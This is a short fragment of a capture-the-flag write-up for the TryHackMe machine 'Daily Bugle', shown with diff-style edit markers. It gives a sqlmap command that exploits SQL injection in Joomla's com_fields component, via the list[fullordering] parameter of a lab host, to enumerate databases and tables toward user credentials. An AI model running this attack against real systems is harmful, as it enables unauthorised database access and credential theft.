This is a write-up for the machine Daily Bugle from tryhackme.

 Exploiting SQLI to access Joomla

-We use this commands to dump the tables, the user
+We use this commands to dump the tables, the user table columns and the user and password columns.

 sqlmap -u "http://10.10.173.19/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch --tables